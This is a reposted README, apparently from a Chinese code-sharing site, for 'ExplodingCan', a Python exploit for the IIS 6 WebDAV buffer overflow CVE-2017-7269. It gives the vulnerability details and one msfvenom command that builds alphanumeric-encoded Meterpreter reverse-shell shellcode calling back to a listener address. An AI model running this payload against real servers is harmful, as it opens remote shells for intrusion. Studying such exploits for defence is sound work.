码迷,mamicode.com
首页 > Web开发 > 详细

Microsoft IIS WebDav 'ScStoragePathFromUrl' Remote Buffer Overflow (CVE-2017-7269)

时间:2018-01-08 01:17:05      阅读:457      评论:0      收藏:0      [点我收藏+]

标签:xpl   tcp   pat   mit   class   window   scl   ima   follow   

ExplodingCan https://github.com/danigargu/explodingcan  

An implementation of ExplodingCan‘s exploit extracted from FuzzBunch, the "Metasploit" of the NSA.

技术分享图片

Details

  • Vulnerability: Microsoft IIS WebDav ‘ScStoragePathFromUrl‘ Remote Buffer Overflow
  • CVE: CVE-2017-7269
  • Disclosure date: March 31 2017
  • Affected product: Microsoft Windows Server 2003 R2 SP2 x86

Why?

Months ago I needed to study this exploit, and finally I implemented it in python.

Shellcode

The shellcode must be in alphanumeric format due to the limitations of the bug. For example we can use msfvenom(metasploit) with the alpha_mixed encoder.

$ msfvenom -p windows/meterpreter/reverse_tcp -f raw -v sc -e x86/alpha_mixed LHOST=172.16.20.1 LPORT=4444 >shellcode



Microsoft IIS WebDav 'ScStoragePathFromUrl' Remote Buffer Overflow (CVE-2017-7269)

标签:xpl   tcp   pat   mit   class   window   scl   ima   follow   

原文地址:https://www.cnblogs.com/0day5/p/8232656.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!